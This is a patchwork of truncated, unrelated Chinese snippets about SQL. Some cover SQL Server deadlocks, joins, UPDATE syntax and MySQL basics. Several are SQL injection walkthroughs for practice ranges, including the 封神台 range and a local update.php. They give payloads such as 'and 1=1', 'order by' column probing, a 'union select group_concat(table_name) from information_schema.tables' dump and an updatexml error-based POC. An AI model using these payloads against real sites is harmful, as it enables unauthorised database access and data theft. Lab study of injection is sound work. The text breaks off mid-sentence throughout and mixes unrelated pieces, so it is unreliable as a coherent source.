数字型注入 0x01 burp抓包,发送至repeater 后面加and 1=1,and 1=2 可判断存在注入 0x02 通过order by判断字段数,order by 2 和order by 3 返回结果不同,可得字段数为2 0x03 查看表名: union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() 0x04 查询users表中的数据: u
提到死锁,最最常规的场景之一是Session1 以排它锁的方式锁定A表,请求B表,session2以排它锁的方式锁定B表,请求A表之类的,访问顺序不一致导致死锁的情况本文通过简化,测试这样一种稍显特殊的场景:对同一张表,并发update其中的多行记录引起的死锁,同时简单分析,对于update操作的加锁步骤这种场景引起的死锁比较少见,但是并不代表不存在,在某些并发场景下,可能会引起死锁的,应该需要引起重视. 测试环境搭建 sqlserver 数据库版本: Microsoft SQL Server
? 1 **SQL多表连查** ? 1 2 3 4 5 6 7 8 --查询员工和部门信息 select * from emp e,dept d where e.deptno=d.deptno --查询员工姓名,部门名称 select e.ename,d.dname from emp e,dept d where e.deptno = d.deptno --查询所有员工姓名,部门名称 select e.*, d.dname from emp e,dept d where e.deptno=d.d
靶场地址:封神台 方法一.首先尝试手工找注入点判断 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车,页面返回正常 构造 ?id=1 and 1=2 ,回车,页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车,页面正常 构造 ?id=1 and 1=1 order by 2 回车,页面正常 构造 ?id=1 and 1=1 order by 3 回车,页面返回 错误,判断字段数为
访问首页的update模块http://127.0.0.1/sql/update.php,开始对update模块进行测试. update语法: UPDATE [users] SET [username] = ['haxotron9000'] WHERE username = ['1'] 接收的参数可能拼接到上述语句中[]的任一个位置,4个位置,共有5种不同的类型.下面开始演示: 一.String in WHERE clause 构造POC: ' or updatexml(1,concat(0x7
UPDATE dbo.NodeInstance SET OrderNumber=temp.OrderNo FROM dbo.NodeInstance ins,dbo.NodeTemplate temp WHERE ins.TemplateID=temp.TemplateID --update 表一 set Gmoney = 表二.列名 from 表一,表二 where 表一.EMPID = 表二.EMPID
进入数据库: mysql> use sunshine_blog;输出: Database changed 查数据库表: mysql> show tables;输出: +-------------------------+ | Tables_in_sunshine_blog | +-------------------------+ | test | | user | +-------------------------+ rows in set (0.00 sec) 建表:auto_incre
抄录网址:https://blog.csdn.net/qiumuxia0921/article/details/50574879 下面是我们的建表语句: SET ANSI_NULLS ON GO SET QUOTED_IDENTIFIER ON GO CREATE TABLE [dbo].[table1]( ) NULL, ) NOT NULL, ) NULL ) ON [PRIMARY] GO ') ') ') ') ') ') ') ') ') 我们第一个update事务为: SET TRA